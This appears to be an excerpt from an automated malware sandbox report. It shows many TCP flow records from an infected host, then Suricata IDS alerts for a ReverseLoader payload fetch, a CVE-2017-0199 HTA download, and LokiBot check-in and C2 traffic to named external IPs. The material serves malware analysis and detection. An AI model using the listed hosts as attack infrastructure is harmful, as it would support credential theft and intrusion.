Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 188.114.97.3:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49170 -> 192.3.176.141:80
Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.176.141:80 -> 192.168.2.22:49166
Source: Network traffic	Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49172 -> 192.3.176.141:80
Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.176.141:80 -> 192.168.2.22:49164
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49194 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49194 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49194 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49187 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49187 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49187 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49193 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49193 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49193 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49202 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49202 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49202 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49196 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49179 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49187 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49179 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49187 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49196 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49178 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49178 -> 94.156.177.220:80
